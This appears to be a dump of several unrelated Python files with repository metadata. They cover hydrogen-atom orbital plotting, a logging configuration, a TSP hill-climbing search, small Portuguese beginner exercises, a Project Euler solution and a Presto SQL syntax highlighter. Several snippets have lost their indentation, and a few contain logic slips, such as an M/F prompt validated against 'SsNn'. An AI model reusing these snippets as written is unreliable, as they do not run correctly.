return np.square((1/(4*np.sqrt(2*np.pi))*(2-(r))*np.e**(-r/2)))
x=np.linspace(-10,10,30)
y=np.linspace(-10,10,30)
z=np.linspace(-10,10,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_2s(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 2s density")
plt.show()
def prob_2p(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square((1/4)*(1/np.sqrt(2*np.pi))*r*(np.e**(-r))*np.cos(theta))
x=np.linspace(-10,10,30)
y=np.linspace(-10,10,30)
z=np.linspace(-10,10,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_2p(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 2p density")
plt.show()
def prob_3s(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square((1/81)*(1/(np.sqrt(3*np.pi)))*(np.e**(-r/3))*(27-(18*r)+(2*r**2)))
x=np.linspace(-15,15,30)
y=np.linspace(-15,15,30)
z=np.linspace(-15,15,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_3s(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 3s density")
plt.show()
def prob_3p(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square((np.sqrt(2)/81)*(1/(np.sqrt(np.pi)))*(np.e**(-r/3))*(6-r))
x=np.linspace(-25,25,30)
y=np.linspace(-25,25,30)
z=np.linspace(-25,25,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_3p(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 3p density")
plt.show()
def prob_3d(x,y,z):
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
return np.square(((r**2)/81)*(1/np.sqrt(6*np.pi))*(np.e**(-r/3))*((3*np.cos(theta)**2)-1))
x=np.linspace(-25,25,30)
y=np.linspace(-25,25,30)
z=np.linspace(-25,25,30)
elements = []
probability = []
for ix in x:
for iy in y:
for iz in z:
elements.append(str((ix,iy,iz)))
probability.append(prob_3d(ix,iy,iz))
probability = probability/sum(probability)
coord = np.random.choice(elements, size=100000, replace=True, p=probability)
elem_mat = [i.split(',') for i in coord]
elem_mat = np.matrix(elem_mat)
x_coords = [float(i.item()[1:]) for i in elem_mat[:,0]]
y_coords = [float(i.item()) for i in elem_mat[:,1]]
z_coords = [float(i.item()[0:-1]) for i in elem_mat[:,2]]
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x_coords, y_coords, z_coords, alpha=0.05)
ax.set_title("Hydrogen 3d density")
plt.show()
n=1
Es=[]
radii=[]
Vs=[]
Ps=[]
while n<=10:
e=E(n)
rs=r(n)
vs=v(n)
ps=p(n)
radii.append([rs,rs])
Es.append([e,e])
Vs.append([vs,vs])
Ps.append([ps,ps])
n=n+1
x=[1,2]
plt.figure(figsize=(1.5,6))
plt.plot(x,Es[0],'k')
plt.plot(x,Es[1],'k')
plt.plot(x,Es[2],'k')
plt.plot(x,Es[3],'k')
plt.plot(x,Es[4],'k')
plt.plot(x,Es[5],'k')
plt.plot(x,Es[6],'k')
plt.plot(x,Es[7],'k')
plt.plot(x,Es[8],'k')
plt.plot(x,Es[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([-13.6, -3.4, -1.5, -.85, -.2],('n=1, -13.6eV','n=2, -3.4eV','n=3, -1.5eV','n=4,0.85eV','n=5+'))
plt.xticks([])
plt.title('Energy Levels of a Hydrogen Atom electron')
plt.show()
plt.figure(figsize=(1.5,6))
plt.plot(x,radii[0],'k')
plt.plot(x,radii[1],'k')
plt.plot(x,radii[2],'k')
plt.plot(x,radii[3],'k')
plt.plot(x,radii[4],'k')
plt.plot(x,radii[5],'k')
plt.plot(x,radii[6],'k')
plt.plot(x,radii[7],'k')
plt.plot(x,radii[8],'k')
plt.plot(x,radii[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([1,4,8,16,25,36,49,64,81,100])
plt.xticks([])
plt.title('Quantized Radii of electron [Bohr radii]')
plt.show()
plt.figure(figsize=(1.5,6))
plt.plot(x,Vs[0],'k')
plt.plot(x,Vs[1],'k')
plt.plot(x,Vs[2],'k')
plt.plot(x,Vs[3],'k')
plt.plot(x,Vs[4],'k')
plt.plot(x,Vs[5],'k')
plt.plot(x,Vs[6],'k')
plt.plot(x,Vs[7],'k')
plt.plot(x,Vs[8],'k')
plt.plot(x,Vs[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([2.2e6,1.1e6,7.3e5,5.5e5,4.4e5,3.6e5],('2.2e6','1.1e6','7.3e5','5.5e5','4.4e5','n=6+'))
plt.xticks([])
plt.title('Quantized Velocity of electron [m/s]')
plt.show()
plt.figure(figsize=(1.5,6))
plt.plot(x,Ps[0],'k')
plt.plot(x,Ps[1],'k')
plt.plot(x,Ps[2],'k')
plt.plot(x,Ps[3],'k')
plt.plot(x,Ps[4],'k')
plt.plot(x,Ps[5],'k')
plt.plot(x,Ps[6],'k')
plt.plot(x,Ps[7],'k')
plt.plot(x,Ps[8],'k')
plt.plot(x,Ps[9],'k')
plt.xlim(1.1,1.9)
plt.yticks([2,1,.66,.5,.4,.33],('2','1','.66','.5','.4','n=6+'))
plt.xticks([])
plt.title('Quantized momenta of electron [e-24 kg.m/s]')
plt.show()
zs=2
ZEs=[]
while zs<=5:
zes=Ze(zs,1)
ZEs.append([zes,zes])
zs=zs+1
plt.figure(figsize=(1.5,6))
plt.plot(x,ZEs[0])
plt.plot(x,ZEs[1])
plt.plot(x,ZEs[2])
plt.plot(x,ZEs[3])
plt.xlim(1.1,1.9)
plt.yticks([-54.43,-122.46,-217.71,-340.17],('He(-54.43Ev)','Li(-122.46eV)','Be(-217.71eV)','B(-340.17eV)'))
plt.xticks([])
plt.title('Ionizing Energy of ground state electron for Z=2-5')
plt.show()
m,n=10,2
BalmerphotonE=[]
Balmerphotonwavelength=[]
while m>n:
BPE=delE(m,n)
BPW=photonwavel(BPE)
BPWref=BPW/1e-9
BalmerphotonE.append(BPE)
Balmerphotonwavelength.append([BPWref,BPWref])
m=m-1
plt.figure(figsize=(15,1.5))
ax=plt.axes()
ax.set_facecolor('black')
plt.plot(Balmerphotonwavelength[0],x, color='indigo')
plt.plot(Balmerphotonwavelength[1],x, color='indigo')
plt.plot(Balmerphotonwavelength[2],x, color='indigo')
plt.plot(Balmerphotonwavelength[3],x, color='indigo')
plt.plot(Balmerphotonwavelength[4],x, color='purple')
plt.plot(Balmerphotonwavelength[5],x, color='blue')
plt.plot(Balmerphotonwavelength[6],x, color='green')
plt.plot(Balmerphotonwavelength[7],x, color='red')
plt.ylim(1.1,1.9)
plt.xticks([396,410,434,485,656],('<---UV','410nm','434nm','486nm','656nm'))
plt.title('Balmer series Hydrogen Emission Spectrum')
plt.yticks([])
plt.show()
from mpl_toolkits.mplot3d import Axes3D
n=1
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
X=[x]
PSI=[0]
P=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
X.append(x)
PSI.append(psi)
P.append((np.sqrt(2/L)*np.sin(k*x))**2)
n=2
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
PSI2=[0]
P2=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
PSI2.append(psi+5)
P2.append(((np.sqrt(2/L)*np.sin(k*x))**2)+5)
n=3
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
PSI3=[0]
P3=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
PSI3.append(psi+10)
P3.append(((np.sqrt(2/L)*np.sin(k*x))**2)+10)
n=4
L=1
k=n*np.pi/L
x=0
psi=np.sqrt(2/L)*np.sin(k*x)
dpsi=np.sqrt(2)*k*np.cos(k*x)/np.sqrt(L)
PSI4=[0]
P4=[psi**2]
dx=1e-5
while x<=L:
d2psi=-k**2*(np.sqrt(2/L))*np.sin(k*x)
dpsi=dpsi+d2psi*dx
psi=psi+dpsi*dx
x=x+dx
PSI4.append(psi+15)
P4.append(((np.sqrt(2/L)*np.sin(k*x))**2)+15)
xgrid=[0,1]
ygrid=[[0,0],[5,5],[10,10],[15,15]]
plt.figure(figsize=(3,6))
plt.title('Wave function for Psi(x,n)')
plt.plot(X,PSI,color='blue')
plt.plot(xgrid,ygrid[0],color='black')
plt.plot(xgrid,ygrid[1],color='black')
plt.plot(xgrid,ygrid[2],color='black')
plt.plot(xgrid,ygrid[3],color='black')
plt.plot(X,PSI2,color='blue')
plt.plot(X,PSI3,color='blue')
plt.plot(X,PSI4,color='blue')
plt.xlim(0,1)
plt.yticks([0,5,10,15],('n=1','n=2','n=3','n=4'))
plt.xticks([0,1],('0','L'))
plt.show()
plt.figure(figsize=(3,6))
plt.title('Probability curve for Psi(x,n)')
plt.plot(X,P,color='blue')
plt.plot(X,P2,color='blue')
plt.plot(X,P3,color='blue')
plt.plot(X,P4,color='blue')
plt.plot(xgrid,ygrid[0],color='black')
plt.plot(xgrid,ygrid[1],color='black')
plt.plot(xgrid,ygrid[2],color='black')
plt.plot(xgrid,ygrid[3],color='black')
plt.xlim(0.1,1)
plt.yticks([0,5,10,15],('n=1','n=2','n=3','n=4'))
plt.xticks([0,1],('0','L'))
plt.show()
n=1
k=n*np.pi/L
def f(x, y):
return np.sqrt(2/L)*np.sin(k*x)*np.sqrt(2/L)*np.sin(k*y)
x = np.linspace(-L, L, 30)
y = np.linspace(-L, L, 30)
X, Y = np.meshgrid(x, y)
Z = f(X, Y)
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.contour3D(X, Y, Z, 50, cmap='viridis')
ax.set_xlabel('x')
plt.xticks([])
plt.yticks([])
ax.set_zticks([])
ax.set_ylabel('y')
ax.set_zlabel('z')
import scipy.integrate as inte
import scipy.optimize as opt
def findzeros(rightvals):
return np.where(np.diff(np.signbit(rightvals)))[0]
def shoot_ode(E,psi_init,x,L):
sol=inte.odeint(schrderiv,psi_init,x,args=(L,E))
return sol[len(sol)-1][0]
def schrderiv(y,r,L,E):
du2=y[0]*((L*(L+1))/(r**2)-2/r-E)
return [y[1],du2]
def normalize(output):
normal = max(output)
return output*(1/normal)
def shoothydr(psi_init,h_,L):
x_arr_hy=np.arange(0.0001,35.0+h_,h_)
E_arr = np.arange(-1,0,.001)
rightb=[]
for EE in E_arr:
psi=inte.odeint(schrderiv,psi_init,x_arr_hy,args=(L,EE))[:,0]
rightb.append(psi[len(psi)-1])
rightb_arr=np.asarray(rightb)
crossings=findzeros(rightb_arr)
energy_1=[]
for cross in crossings:
energy_1.append(opt.newton(shoot_ode,E_arr[cross],args=(psi_init,x_arr_hy,L)))
psi_out=[]
for EN in energy_1:
psi_out.append(inte.odeint(schrderiv,psi_init,x_arr_hy,args=(L,EN))[:,0])
return x_arr_hy,np.asarray(psi_out)
def HYDRO(x,N,L):
if (((N-L-1)==0) and (L==0)):
return x*np.exp(-x)
elif (((N-L-1)==1) and (L==0)):
return (np.sqrt(2)*(-x+2)*np.exp(-x/2)/4)*x
elif ((N-L-1)==2):
return (2*np.sqrt(3)*(2*x**2/9-2*x+3)*np.exp(-x/3)/27)*x
elif (((N-L-1)==0) and (L==1)):
return (np.sqrt(6)*x*np.exp(-x/2)/12)*x
else:
print("No wavefunction found")
def plot_wave(fig,title_string,x_arr,num_arr,ana_arr,axis_list):
plt.cla()
plt.clf()
plt.plot(x_arr,num_arr,'b.',linewidth=4,label=r"$\Psi(\hat{x})_{num}$")
plt.plot(x_arr,normalize(ana_arr),'r-',label=r"$\Psi(\hat{x})_{ana}$")
plt.ylabel(r"$\Psi(\hat{x})$",fontsize=16)
plt.xlabel(r"$\hat{x}$",fontsize='small')
plt.axis(axis_list)
plt.title(title_string)
plt.grid()
psi_0=0.0
phi_0=1.0
psi_init=np.asarray([psi_0,phi_0])
h_=1.0/200.0
fig=plt.figure()
hydro_x,hydro_num=shoothydr(psi_init,h_,0)
hydro_x2p,hydro_num2p=shoothydr(psi_init,h_,1)
hydro_ana1s=HYDRO(hydro_x,1,0)
hydro_ana2s=HYDRO(hydro_x,2,0)
hydro_ana3s=HYDRO(hydro_x,3,0)
hydro_ana2p=HYDRO(hydro_x,2,1)
print("Hydrogen shooting")
plot_wave(fig,"Hydrogen Atom, 1s",hydro_x,normalize(hydro_num[0,:]),hydro_ana1s,[-0.1,30,-0.1,1.2])
fig1=plt.figure()
plot_wave(fig1,"Hydrogen Atom, 2s",hydro_x,normalize(hydro_num[1,:]),hydro_ana2s,[-0.1,30,-2.2,1.2])
fig2=plt.figure()
plot_wave(fig2,"Hydrogen Atom, 2p",hydro_x2p,normalize(hydro_num2p[0,:]),hydro_ana2p,[-0.1,30,-0.1,1.2])
fig3=plt.figure()
plot_wave(fig3,"Hydrogen Atom, 3s",hydro_x,normalize(hydro_num[2,:]),hydro_ana3s,[-0.1,30,-1.2,1.2])
from mayavi import mlab
x, y, z = np.ogrid[-25:25:200j, -25:25:200j, -25:25:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square(((r**2)/81)*(1/np.sqrt(6*np.pi))*(np.e**(-r/3))*((3*np.cos(theta)**2)-1))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("3d Hydrogen")
mlab.show()
x, y, z = np.ogrid[-25:25:200j, -25:25:200j, -25:25:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((np.sqrt(2)/81)*(1/(np.sqrt(np.pi)))*(np.e**(-r/3))*(6-r))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("3p Hydrogen")
mlab.show()
x, y, z = np.ogrid[-15:15:200j, -15:15:200j, -15:15:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((1/81)*(1/(np.sqrt(3*np.pi)))*(np.e**(-r/3))*(27-(18*r)+(2*r**2)))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("3s Hydrogen")
mlab.show()
x, y, z = np.ogrid[-10:10:200j, -10:10:200j, -10:10:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((1/4)*(1/np.sqrt(2*np.pi))*r*(np.e**(-r))*np.cos(theta))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("2p Hydrogen")
mlab.show()
x, y, z = np.ogrid[-10:10:200j, -10:10:200j, -10:10:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((1/(4*np.sqrt(2*np.pi))*(2-(r))*np.e**(-r/2)))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("2s Hydrogen")
mlab.show()
x, y, z = np.ogrid[-5:5:200j, -5:5:200j, -5:5:200j]
r=np.sqrt(np.square(x)+np.square(y)+np.square(z))
phi=np.arctan(y/x)
theta=np.arccos(z/r)
s=np.square((2/(np.sqrt(np.pi)))*np.e**(-r))
mlab.pipeline.volume(mlab.pipeline.scalar_field(s))
mlab.title("1s Hydrogen")
mlab.show()
| 2.015625
| 2
|
src/seedwork/infrastructure/logging.py
|
Ermlab/python-ddd
| 308
|
12777968
|
from pythonjsonlogger import jsonlogger
from datetime import datetime
import logging
from logging import Logger
from logging.config import dictConfig
from seedwork.utils.functional import SimpleLazyObject
from seedwork.infrastructure.request_context import request_context
class RequestContextFilter(logging.Filter):
""" "Provides correlation id parameter for the logger"""
def __init__(self, name: str, request_context) -> None:
super().__init__(name=name)
self.request_context = request_context
def filter(self, record):
record.correlation_id = self.request_context.correlation_id.get()
return True
class ElkJsonFormatter(jsonlogger.JsonFormatter):
"""
ELK stack-compatibile formatter
"""
def add_fields(self, log_record, record, message_dict):
super(ElkJsonFormatter, self).add_fields(log_record, record, message_dict)
log_record["@timestamp"] = datetime.now().isoformat()
log_record["level"] = record.levelname
log_record["logger"] = record.name
class LoggerFactory:
_configured = False
@classmethod
def configure(
cls,
logger_name="app",
log_filename="./logs.json",
request_context=request_context,
):
cls.logger_name = logger_name
cls.log_filename = log_filename
cls.request_context = request_context
cls._configured = True
@classmethod
def create_logger(cls):
"""
Returns a logger instance, based on a configuration options
"""
if not cls._configured:
cls.configure()
logging_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"default": {
# exact format is not important, this is the minimum information
"format": "%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
},
"colored": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
"log_colors": {
"DEBUG": "white",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red,bold",
},
},
"colored_db": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
"log_colors": {
"DEBUG": "purple",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red,bold",
},
},
"json_formatter": {
"()": "seedwork.infrastructure.logging.ElkJsonFormatter",
},
},
"handlers": {
# console logs to stderr
"console": {
"class": "logging.StreamHandler",
"formatter": "default",
},
"colored_console": {
"class": "colorlog.StreamHandler",
"formatter": "colored",
},
"colored_console_db": {
"class": "colorlog.StreamHandler",
"formatter": "colored_db",
},
"file_handler": {
"class": "logging.handlers.RotatingFileHandler",
"filename": cls.log_filename,
"formatter": "json_formatter",
}
if cls.log_filename
else None,
# Add Handler for Sentry for `warning` and above
# 'sentry': {
# 'level': 'WARNING',
# 'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
# },
},
"loggers": {
cls.logger_name: {
"level": "DEBUG",
"handlers": ["colored_console", "file_handler"], # , 'sentry'],
},
# Prevent noisy modules from logging to Sentry
"noisy_module": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
},
}
dictConfig(logging_config)
logger = logging.getLogger(name=cls.logger_name)
logger.addFilter(
RequestContextFilter(
name=cls.logger_name, request_context=cls.request_context
)
)
return logger
"""
We are making logger globally available, but to make it configurable logger lazy-evaluated.
Use `LoggerFactory.configure()` to configure the logger prior to its usage
"""
logger = SimpleLazyObject(LoggerFactory.create_logger)
| 2.25
| 2
|
research/coefficients.py
|
carrino/FrisPy
| 0
|
12777969
|
<reponame>carrino/FrisPy<gh_stars>0
import math
from pprint import pprint
import matplotlib.pyplot as plt
from frispy import Discs
model = Discs.ultrastar
# plot coefficients from -180 to 180
deg = range(-90, 90)
#lift = [model.C_lift(x * math.pi / 180) for x in deg]
#plt.plot(deg, lift)
#drag = [model.C_y(x * math.pi / 180) for x in deg]
#plt.plot(deg, drag)
pitch = [model.C_y(x * math.pi / 180) for x in deg]
plt.plot(deg, pitch)
plt.show()
| 2.578125
| 3
|
Traveling Salesman/parametric.py
|
lbenning/Evolutionary
| 0
|
12777970
|
import math
import random
import numpy
from tools import *
'''
Parametric Optimizers to search for optimal TSP solution.
Method 1: Stochastic Hill Climbing search
Method 2: Random Search - Used as benchmark
'''
# Initialize the population, a collection of paths
def createPath(m):
n = numpy.arange(1,m+1)
numpy.random.shuffle(n)
return n
# Perform a stochastic hill climbing search
def stochClimb(points,bound,inter):
p = len(points)
# ctr for fitness func. eval.
ctr = 0
# data taken at each i in inter
data = []
# best seen so far
maxfit = 0.0
while (ctr < bound):
# Path
v = createPath(p)
f = fitnessShort(v,points)
if (f > maxfit):
maxfit = f
ctr += 1
if (ctr in inter):
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# Create swap indices
o = numpy.arange(v.size)
i = numpy.arange(v.size)
while (ctr < bound):
climbed = False
numpy.random.shuffle(o)
numpy.random.shuffle(i)
for x in range(o.size):
for y in range(i.size):
swap(v,o[x],i[y])
shot = fitnessShort(v,points)
ctr += 1
if (shot <= f):
swap(v,o[x],i[y])
else:
f = shot
climbed = True
if (ctr in inter):
if (shot > maxfit):
maxfit = shot
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# If no improvement made, local optimum reached
# Return solution, otherwise keep trying to climb
if (not climbed):
break
else:
if (f > maxfit):
maxfit = f
# Perform a random search, used primarily for benchmarking
def randSearch(points,bound,inter):
p = len(points)
scores = []
best = 0.0
for x in range(1,bound+1):
z = createPath(p)
s = fitnessShort(z,points)
if (s > best):
best = s
if (x in inter):
scores.append(1.0/best)
return scores
| 3.28125
| 3
|
exercicios_pyhton/leia_int_leia_fload/validar_dados.py
|
wcalazans81/cursoemvideo_de_python
| 0
|
12777971
|
<gh_stars>0
sexo = str(input('Quer continuar? [M/F] ')).strip().upper()[0]
while sexo not in 'SsNn':
sexo = str(input('Por favor digite um sexo válido! [M/F] ')).strip().upper()[0]
print(f'Sexo {sexo} registrado com sucesso.')
| 3.484375
| 3
|
2019-10-10-at1-op2.py
|
mpassosbr/python3
| 0
|
12777972
|
<reponame>mpassosbr/python3
print("Calculadora completa")
num1 = input("Digite o primeiro número: ")
operador = input("Digite um operador matemático (+, -, *, /): ")
num2 = input("Digite o segundo número: ")
msg_op = False
try:
num1 = float(num1)
num2 = float(num2)
if operador == "+":
resultado = num1 + num2
elif operador == "-":
resultado = num1 - num2
elif operador == "*":
resultado = num1 * num2
elif operador == "/":
resultado = num1 / num2
else:
msg_op = True
print("Resultado: " + str(resultado))
if resultado == int(resultado):
print("O resultado é um número inteiro.")
else:
print("O resultado é um número decimal.")
except:
if msg_op:
print("O operador matemático digitado é inválido.")
else:
print("Digite apenas números, por favor.")
| 4.3125
| 4
|
mysfire/processors/_array_utils.py
|
DavidMChan/mysfire
| 3
|
12777973
|
from typing import Dict, List, Optional, Union
import torch
from ..torch_utils import padded_stack
def stack_arrays_as_dict(
batch: List[Optional[torch.Tensor]], pad: bool = True
) -> Optional[
Union[
torch.Tensor,
Dict[str, Union[Optional[torch.Tensor], Optional[List[Optional[torch.Tensor]]]]],
List[Optional[torch.Tensor]],
]
]:
"""Stack a list of optional tensors into either a single tensor or a set of ragged tensors.
NOTE: Should be used within the collate function, otherwise "__root__" doesn't really make sense.
Args:
batch (List[Optional[torch.Tensor]]): The batch of tensors to stack.
pad (bool, optional): If the tensors should be stacked as a ragged set, or as a single tensor. Defaults to True.
Returns:
Optional[ Union[
torch.Tensor,
Dict[str, Union[Optional[torch.Tensor],Optional[List[Optional[torch.Tensor]]]]],
List[Optional[torch.Tensor]], ] ]: The stacked/ragged tensors
"""
# If the input shape is the same for every element in the batch, stack the arrays, else pad the arrays to the
# same shape.
proto_s = [b for b in batch if b is not None]
if not proto_s:
return [None] * len(batch)
proto = proto_s[0]
if all([x is None or x.shape == proto.shape for x in batch]):
if pad:
return {
"__root__": torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0),
"seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch]),
}
return torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0)
if all([x is None or x.shape[1:] == proto.shape[1:] for x in batch]):
if pad:
# Pad the first axis, and return sequence lengths
tensors = [x if x is not None else torch.zeros(*proto.shape[1:]).to(proto.dtype) for x in batch]
d, s = padded_stack(tensors)
return {"__root__": d, "seqlen": s}
# TODO: Correct the return types on this data
if pad:
return {"__root__": batch, "seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch])}
return batch
| 2.640625
| 3
|
0003/solution.py
|
rnsavinelli/project-euler
| 1
|
12777974
|
#!/usr/bin/python3
import math
def is_prime2(n: int) -> bool:
if n >= 2:
for i in range(2, n):
if not (n % i):
return False
else:
return False
return True
def prime_factors(n: int) -> []:
primes = []
for i in range(1, math.floor(math.sqrt(n)) + 1):
if n % i == 0:
if is_prime2(i):
primes.insert(0, i)
if is_prime2(n):
primes.append(i)
return primes
def solve(n: int) -> (int):
return prime_factors(n)[0]
if __name__ == '__main__':
print(solve(600851475143))
| 3.75
| 4
|
MP3-testfiles/word_count_juice.py
|
dayuebai/PassionFruit
| 0
|
12777975
|
#!/usr/local/bin/python3
# This script counts the number of 1's in the file, and output the <key,count> pair
# argv[1] a key i.e. a word
# argv[2] a file containing a list of 1's
#
# Author: <NAME>, <NAME>
# Date: 11/23/2020
import sys
key = sys.argv[1]
filename = sys.argv[2]
count = 0
with open(filename, "r") as file:
for line in file:
if len(line.strip()) > 0:
count += 1
print(key + "," + str(count))
| 3.6875
| 4
|
syntax.py
|
piekill/pypresto
| 4
|
12777976
|
<filename>syntax.py
# syntax.py
from PyQt5.QtCore import QRegExp, Qt
from PyQt5.QtGui import QColor, QTextCharFormat, QFont, QSyntaxHighlighter
def format(color, style=''):
"""Return a QTextCharFormat with the given attributes.
"""
_color = QColor()
_color.setNamedColor(color)
_format = QTextCharFormat()
_format.setForeground(_color)
if 'bold' in style:
_format.setFontWeight(QFont.Bold)
if 'italic' in style:
_format.setFontItalic(True)
return _format
# Syntax styles that can be shared by all languages
STYLES = {
'keyword': format('blue'),
'operator': format('red'),
'brace': format('darkGray'),
'constant': format('black', 'bold'),
'string': format('magenta'),
'string2': format('darkMagenta'),
'comment': format('darkGreen', 'italic'),
'function': format('darkCyan', 'italic'),
'numbers': format('brown'),
}
class PrestoHighlighter (QSyntaxHighlighter):
"""Syntax highlighter for Presto SQL.
"""
# keywords
keywords = [
'alter', 'as', 'by', 'case', 'constraint', 'create', 'cross', 'cube',
'deallocate', 'delete', 'describe', 'distinct', 'drop', 'else', 'end',
'escape', 'except', 'execute', 'exists', 'extract', 'for', 'from',
'full', 'group', 'grouping', 'having', 'inner', 'insert', 'intersect',
'into', 'join', 'left', 'natural', 'normalize', 'on', 'order', 'outer',
'prepare', 'recursive', 'right', 'rollup', 'select', 'show', 'table',
'then', 'uescape', 'union', 'using', 'values', 'when', 'where', 'with']
# functions
functions = [
'abs', 'acos', 'approx_distinct', 'approx_percentile', 'approx_set',
'arbitrary', 'array_agg', 'array_distinct', 'array_except',
'array_intersect', 'array_join', 'array_max', 'array_min',
'array_position', 'array_remove', 'array_sort', 'array_union',
'arrays_overlap', 'asin', 'atan', 'atan2', 'avg', 'bar', 'beta_cdf',
'cardinality', 'cast', 'cbrt', 'ceil', 'ceiling', 'char2hexint',
'checksum', 'chr', 'classify', 'coalesce', 'codepoint', 'color',
'concat', 'contains', 'convex_hull_agg', 'corr', 'cos', 'cosh',
'cosine_similarity', 'count', 'count_if', 'covar_pop', 'covar_samp',
'crc32', 'cume_dist', 'current_date', 'current_path', 'current_time',
'current_timestamp', 'current_timezone', 'current_user', 'date',
'date_add', 'date_diff', 'date_format', 'date_parse', 'date_trunc',
